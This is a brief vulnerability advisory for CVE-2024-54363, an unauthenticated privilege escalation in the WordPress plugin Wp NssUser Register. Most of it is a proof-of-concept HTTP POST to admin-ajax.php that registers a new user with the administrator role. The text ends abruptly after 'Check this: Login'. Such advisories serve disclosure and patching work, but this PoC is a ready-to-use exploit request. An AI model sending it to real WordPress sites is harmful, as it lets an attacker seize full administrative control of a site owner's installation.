# CVE-2024-54363 Wp NssUser Register <= 1.0.0 - Unauthenticated Privilege Escalation # Description The Wp NssUser Register plugin for WordPress is vulnerable to privilege escalation in all versions up to, and including, 1.0.0. This makes it possible for unauthenticated attackers to register on the site as administrators. ## Details - **Type**: plugin - **Slug**: wp-nssuser-register - **Affected Version**: 1.0.0 - **CVSS Score**: 9.8 - **CVSS Rating**: Critical - **CVSS Vector**: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H - **CVE**: CVE-2024-54363 - **Status**: Closed POC --- ``` POST /wp-admin/admin-ajax.php HTTP/2 Host: wp-dev.ddev.site User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0 Accept: */* Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded Content-Length: 142 Referer: http://example.com/ action=nssTheme_registration_form&rgName=admin2&rgEmail=admin2@example.com&rgFname=Attacker&rgLname=User&rgRole=administrator&rg_pass=evilpass ``` ```

successful, just Check this:

Login ```